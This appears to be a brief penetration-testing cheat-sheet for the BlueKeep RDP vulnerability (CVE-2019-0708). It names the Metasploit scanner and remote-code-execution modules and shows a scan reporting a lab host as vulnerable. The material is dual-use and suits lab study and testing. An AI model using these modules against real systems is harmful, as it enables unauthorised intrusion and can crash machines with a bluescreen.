CVE-2019-0708
BlueKeep RDP Remote Windows Kernel Use After Free
Section titled “BlueKeep RDP Remote Windows Kernel Use After Free”The exploit will cause bluescreen by default.
Scanner
Section titled “Scanner”msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeepExploit
Section titled “Exploit”msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rceExamples
Section titled “Examples”Scanner example
Section titled “Scanner example”msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 10.10.10.16
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run
[+] 10.10.10.16:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 10.10.10.16:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed